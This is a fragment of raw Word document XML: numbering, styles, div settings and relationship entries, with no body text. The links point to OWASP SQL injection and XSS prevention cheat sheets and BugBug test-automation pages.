  <w:num w:numId="28" w16cid:durableId="2026594912">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="2009670504">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="858661893">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="951136066">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="868226769">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="683171018">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="817502846">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1567883600">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1858277088">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1496872947">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="774208308">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1663464550">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="983193389">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="1240866083">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="1420296665">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1067916852">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1167212861">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="1846245931">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="798033298">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="200217117">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="1622757990">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="207921098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16"/>
    <w:rsid w:val="00094E0F"/>
    <w:rsid w:val="000E6292"/>
    <w:rsid w:val="001844ED"/>
    <w:rsid w:val="001D1995"/>
    <w:rsid w:val="00217090"/>
    <w:rsid w:val="00254721"/>
    <w:rsid w:val="0027628A"/>
    <w:rsid w:val="0030013F"/>
    <w:rsid w:val="0031097F"/>
    <w:rsid w:val="00386DC1"/>
    <w:rsid w:val="004223FE"/>
    <w:rsid w:val="00440C91"/>
    <w:rsid w:val="00452EC2"/>
    <w:rsid w:val="006C3776"/>
    <w:rsid w:val="006F0019"/>
    <w:rsid w:val="007257D8"/>
    <w:rsid w:val="00737B42"/>
    <w:rsid w:val="00774B16"/>
    <w:rsid w:val="008C7F16"/>
    <w:rsid w:val="00906455"/>
    <w:rsid w:val="009F0340"/>
    <w:rsid w:val="00A50622"/>
    <w:rsid w:val="00B52F07"/>
    <w:rsid w:val="00BB61D8"/>
    <w:rsid w:val="00C1443F"/>
    <w:rsid w:val="00CA2C55"/>
    <w:rsid w:val="00D90CCE"/>
    <w:rsid w:val="00DC521A"/>
    <w:rsid w:val="00DD0CA3"/>
    <w:rsid w:val="00E25608"/>
    <w:rsid w:val="00E27684"/>
    <w:rsid w:val="00EC10AD"/>
    <w:rsid w:val="00F3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32CD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BA9011F3-FB81-4A1A-8EF7-29BF645D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7F1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7F1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7F1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C7F1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C7F1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C7F1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7F1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7F1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7F1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7F16"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="es-BO"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo2Car">
    <w:name w:val="Título 2 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="008C7F16"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="es-BO"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo3Car">
    <w:name w:val="Título 3 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="008C7F16"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="es-BO"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo4Car">
    <w:name w:val="Título 4 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="008C7F16"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:lang w:val="es-BO"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo5Car">
    <w:name w:val="Título 5 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="008C7F16"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:lang w:val="es-BO"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo6Car">
    <w:name w:val="Título 6 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="008C7F16"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:lang w:val="es-BO"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo7Car">
    <w:name w:val="Título 7 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="008C7F16"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:lang w:val="es-BO"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo8Car">
    <w:name w:val="Título 8 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="008C7F16"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="es-BO"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo9Car">
    <w:name w:val="Título 9 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="008C7F16"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="es-BO"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="008C7F16"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TtuloTDC">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Ttulo1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008C7F16"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008C7F16"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008C7F16"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008C7F16"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Tablanormal1">
    <w:name w:val="Plain Table 1"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="41"/>
    <w:rsid w:val="0030013F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="es-BO"/>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30013F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DC521A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Encabezado">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EncabezadoCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DD0C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D0CA3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DD0C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D0CA3"/>
  </w:style>
  <w:style w:type="character" w:styleId="Mencinsinresolver">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D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908">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="145437264">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="233206589">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="248009587">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="349648413">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="612788026">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="624507861">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="832336464">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="872576459">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="933249778">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="956175630">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1122920663">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1181503727">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1212959926">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1293634481">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1306467603">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1625037549">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1702316612">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1802267255">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1819953911">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1860391280">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1888449654">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1891260253">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1971742038">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1992245380">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2079091732">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21330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cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html" TargetMode="External"/><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s://bugbug.io/solutions/test-automation-for-qa/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bugbug.io/features/?utm_source=chatgpt.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owasp.org/www-project-top-ten/"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cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"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bugbug.io/features/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bugbug.io/integrations/?utm_source=chatgpt.co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owasp.org/www-project-top-ten/" TargetMode="External"/><Relationship Id="rId103"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cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html" TargetMode="External"/><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gbug.io/features/?utm_source=chatgpt.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owasp.org/www-project-top-ten/" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://chromewebstore.google.com/detail/bugbug-automation-testing/oiedehaafceacbnnmindilfblafincjb?hl=en&amp;utm_source=chatgpt.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owasp.org/www-project-top-ten/" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"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ugbug.io/features/?utm_source=chatgpt.co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hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"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cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.jpeg"/><Relationship Id="rId61" 